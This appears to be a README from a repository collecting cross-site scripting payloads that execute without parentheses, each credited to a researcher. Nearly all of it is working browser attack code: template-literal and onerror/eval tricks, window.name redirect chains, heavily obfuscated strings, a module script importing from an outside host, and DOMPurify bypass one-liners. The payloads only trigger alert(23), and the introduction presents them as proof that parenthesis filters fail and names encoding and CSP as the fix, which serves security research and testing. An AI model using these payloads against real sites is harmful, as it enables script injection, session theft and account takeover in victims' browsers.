Without-Parentheses.md

XSS Without parentheses ()

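This repo contains XSS payloads that don't require parentheses, collected from tweets, blogs, and similar sources. Each entry shows that a filter which strips or blocks `(` and `)` does not prevent script execution; context-aware output encoding and a strict Content Security Policy (no inline script, no `eval`-style sinks) are what close these paths.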

All the PoCs pop an alert box with the number 23.


alert`23`

window.name="javascript:alert(23)";
location="xss.html";

xss.html

location=name

Cure53

eval.call`${'alert\x2823\x29'}`

Renwa

eval.apply`${[`alert\x2823\x29`]}`

Bo0oM

setTimeout`alert\x2823\x29`
setInterval`alert\x2823\x29`

Garethheyes

onerror=alert;throw 23;

Garethheyes

window.name='javascript:alert\x2823\x29';
Reflect.set.call`${location}${'href'}${name}`

Garethheyes

Reflect.apply.call`${alert}${undefined}${[23]}`

Garethheyes

navigation.navigate`javascript:alert\x2823\x29`

Garethheyes

var{haha:onerror=alert}=0;throw 1
var{a:onerror}={a:alert};throw 1

Garethheyes

'alert\x2823\x29'instanceof{[Symbol.hasInstance]:eval}

Only Chrome Garethheyes

onerror=eval;throw'=alert\x2823\x29';

Only Safari Garethheyes

<svg onload=onerror=eval,new'\u0022-alert\x2823\x29//'>

Garethheyes

{onerror=alert}throw 23

Garethheyes

throw{},onerror??=alert,"XSS"??123

Garethheyes

http://example.com/?%0aalert(23)
location.protocol='javascript:'

Garethheyes

[].sort.call`${alert}23`

Garethheyes

[].map.call`${eval}\\u{61}lert\x2823\x29`

Garethheyes

window.name='javascript:alert(23)';
Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`;

Only Firefox h43z

throw onerror=eval,SyntaxError`alert\x2823\x29` 

Only Firefox h43z

throw onerror=eval,Error`alert\x2823\x29`

h43z

throw Uncaught=onerror=eval,e=Error`*/;alert\x2823\x29`,e.name='/*',e

Garethheyes

[][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]]`$${[!{}+[]][+[]][+!+[]]+[!{}+[]][+[]][+!+[]+!+[]]+[!{}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}$```//Function(alert(1))

terjanq

xss_redir.html

window.name='1;var Uncaught=1;alert(23)';
location='xss_short.html';

xss_short.html

{onerror=eval}throw/0/+name

terjanq

example.com/#1/-alert(23)/
onhashchange=setTimeout;
Object.prototype.toString=RegExp.prototype.toString;
Object.prototype.source=location.hash;
location.hash=null;

terjanq

throw/a/,Uncaught=1,g=alert,a=g+0,onerror=eval,/1/g+a[14]+[23,331,337]+a[15]

terjanq

window.name="alert(23)";
location="xss.html";

xss.html

Function`a${name}```

terjanq

Put %0aalert(/23/)// anywhere in the URL

location='javascript:'+location
location=/javascript:/.source+location
location=`javascript:`+location

terjanq

x={...eval+0,toString:Array.prototype.shift,length:15},
x+x+x+x+x+x+x+x+x+x+x+x+x,
location = /javascript:/.source + alert.name+x+23+x

terjanq

example.com/xss?%0aalert(/23/)//


Function`a${unescape. call`${location}`}```

Nowasky

c=document,h=c.head,x=h.part,p=g=h.id,h.valueOf=p.sub,x.valueOf=p.at,o=g++,l=g++,z=g++,e=g++,a=g++,s=g++,d=g++,j=g++,b=g++,h.part=h+p,y=h.innerHTML=x+p,h.part=h.innerHTML,p+=x,h.part=c.nodeName,p+=x,k=o+p,u=l+p,w=p+l,t=w+l,f=w+o+b+w,h.innerHTML=t+s+t+d+w+z+l+f+o+u+a+j+t+l+t+o+f+l+u+g+j+w+o+k+d+l,h.innerHTML=y+h.innerHTML+p+g+j+f+o+l+t+a+w+l+d+p+a+k+s+k+s+u+a+u+a+j+p+a+j+h

kabilan1290

onerror=alert;setTimeout`\x74\x68\x72\x6F\x77 23`

aemkei

onhashchange=setTimeout;
HashChangeEvent.prototype.toString=
RegExp.prototype.toString;
location.hash=
HashChangeEvent.prototype.source=
'1/-alert\5023\51/';

aemkei

onload=setTimeout
Event.prototype.toString=
_=>"alert\5023\51"

aemkei

throw/**/Uncaught=window.onerror=eval,&quot;;alert\5023\51&quot;

Gareth Heyes

x=new DOMMatrix;
matrix=alert;
x.a=23;
location='javascript'+':'+x

BitK

Function`a${`alert${Function`a${`return fromCharCode`}{fromCharCode}``${String}``40`}23${Function`a${`return fromCharCode`}{fromCharCode}``${String}``41`}`}```

BitK

range = document.createRange``; 
range.createContextualFragment`<img src=x onerror=alert\x2823\x29>'`;

BitK

Function`a${`${Function`a${`return from`}{from}``${Array}``96${Function`a${`return fromCharCode`}{fromCharCode}``${String}`}`}${Function`a${`return fromCharCode`}{fromCharCode}``${String}``${96}${10}${97}${108}${101}${114}${116}${40}${50}${51}${41}`}`}```

albinowax

window.name="alert(23)"
location="xss.html"

xss.html

eval.constructor`eval\x28name\x29```

hasegawayosuke

window.name="alert(23)"
location="xss.html"

xss.html

[].every.call`eval\x28name\x29${eval}`

Tomer Zait

[]["filter"]["constructor"]`alert\x2823\x29```

Pepe Vila

Array.prototype[Symbol.hasInstance]=eval;
"alert\x2823\x29" instanceof [];

RootEval

x='javascript:alert\x2823\x29';x={x:location}=this

iwasakinoriaki

window.name="alert(23)"
location="xss.html"

xss.html

eval.call`${top.name}`

Cure53

window.name="<img src=x onerror=alert(23)>"
location="xss.html"

xss.html

document.write`${top.name}`

Brute Logic

<JavaScript:"\74Svg\57OnLoad\75\141\154\145\162\164\501\51\76"/ContentEditable/AutoFocus/OnFocus=location=tagName>

Brute Logic

<Script Type=Module>import"//X55.is"</Script>

mage_1868

location="https://example.com/xss.html/.source;alert(23)?xss="

example.com

eval.call`${location.pathname}`

Only Firefox Garethheyes

{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:'',message:'alert\x2823\x29'}

ycam

example.com/xss#*/;alert(23);
throw/**/onerror=Uncaught=eval,e={lineNumber:1,columnNumber:1,fileName:'',message:'/*'+location.hash},typeof/**/InstallTrigger!='undefined'?e:e.message

cgvwzq

https://demo.vwzq.net/lol.html

<script/id=Uncaught>

// chrome + firefox

throw[onerror=eval][e=[x='+alert\x2823\x29']]=0[e.lineNumber=e.columnNumber=e.fileName=e.message=x]=e

</script>

<script>

// firefox

onhashchange=setTimeout,HashChangeEvent.prototype[Symbol.toStringTag]='+alert\x2823\x29',location.hash=1

</script>

<script>

// chrome + firefox

Array.prototype[Symbol.hasInstance]=eval,'alert\x2823\x29'instanceof[]

</script>

<script>

// chrome

[onerror=eval][TypeError.prototype.name='=/']['/-alert\x2823\x29//']

</script>


<script>

// chrome

onerror=eval,ReferenceError.prototype.name='=alert\x2823\x29//',lol

</script>

physuru

elem=new Option
elem.classList.valueOf=String.prototype.charAt

elem.innerText=elem.outerHTML
elem.className=elem.innerHTML
amp=Object.__proto__.name+elem.classList

htag=new Text
elem.className=htag.nodeName
htag=Object.__proto__.name+elem.classList

elem.innerHTML=amp+htag+97
a=elem.innerText
elem.innerHTML=amp+htag+99
c=elem.innerText
elem.innerHTML=amp+htag+105
i=elem.innerText
elem.innerHTML=amp+htag+106
j=elem.innerText
elem.innerHTML=amp+htag+112
p=elem.innerText
elem.innerHTML=amp+htag+114
r=elem.innerText
elem.innerHTML=amp+htag+115
s=elem.innerText
elem.innerHTML=amp+htag+116
t=elem.innerText
elem.innerHTML=amp+htag+118
v=elem.innerText

elem.innerHTML=amp+htag+58
colon=elem.innerText

elem.innerHTML=amp+htag+40
lpar=elem.innerText
elem.innerHTML=amp+htag+41
rpar=elem.innerText

location=j+a+v+a+s+c+r+i+p+t+colon+alert.name+lpar+1+rpar

Renwa

document.body.innerHTML="\u003cimg src=x onerror=alert\u002823\u0029\u003e";

Renwa

document.body.innerHTML="&ltimg src=x onerror=alert&lpar;23&rpar;&gt"
document.body.innerHTML=document.body.innerText

If the page is frameable Renwa

data:text/html,<iframe name="<svg/onload=alert(23)>" src="http://example.com/xss?document.body.innerHTML=name">

user00239123

document.location='javascript:alert%2823%29'

Only IE matt

example.com/xss#<img src=x onerror=alert(23)>

document.body.innerHTML=location.hash;

Brutelogic

<svg/onload='alert&#40 23 &#41'> 

Blakils

location=/javascript:alert%2823%29/.source;

Nicocanicolas

http://example.com/?test=&lt;img/src=&quot;x&quot;/onerror=alert(23)&gt;

document.body.innerHTML=location.search;
document.body.innerHTML=document.body.innerText;

With Script Gadgets

Using Prototype Pollution: PP Gadgets Repo


DOMPurify Bypass Parrot

delete DOMPurify.isSupported

DOMPurify Bypass hakatashi

delete document.implementation.__proto__.createHTMLDocument

Anything: @RenwaX23